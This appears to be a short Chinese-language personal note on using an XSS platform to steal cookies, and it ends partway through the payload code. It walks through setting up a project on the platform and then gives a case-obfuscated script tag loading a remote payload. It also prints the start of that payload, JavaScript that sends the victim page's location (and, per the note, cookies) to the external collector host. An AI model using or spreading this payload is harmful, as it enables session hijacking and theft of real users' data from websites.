xss平台利用
xss平台地址
xss.fbisb.com 这个平台上有众多的xss代码
创建过程
点击的项目进行创建
![[Pasted image 20210109141006.png]]
进入项目创建的构造框,我们进行项目的描述
![[Pasted image 20210109141019.png]]
配置代码 勾选默认模块与keepsession
![[Pasted image 20210109141102.png]]
下面为代码,我们打cookie使用下面的这条代码就可以了
<sCRiPt sRC=http://xss.fbisb.com/EfXl></sCrIpT>
这个引用的代码就是下面的那一串大的代码
项目名称: 1
项目代码:
(function(){
(new Image()).src='http://xss.fbisb.com/xss.php?do=api&id=EfXl&location='+escape((function(){
try{
return document.location.href}catch(e){
return ''}})())+'&toplocation='+escape((function(){